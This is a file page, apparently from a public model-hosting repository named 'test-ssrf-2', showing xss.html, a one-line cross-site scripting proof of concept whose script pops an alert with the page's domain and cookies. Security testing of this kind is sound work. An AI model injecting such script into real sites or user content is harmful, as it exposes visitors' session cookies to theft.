test-ssrf-2 / xss.html
osamaeid's picture
test HTML XSS
43b59fc verified
Raw
History Blame Contribute Delete
102 Bytes
<html><body><script>alert(document.domain+"|"+document.cookie)</script><h1>XSS Test</h1></body></html>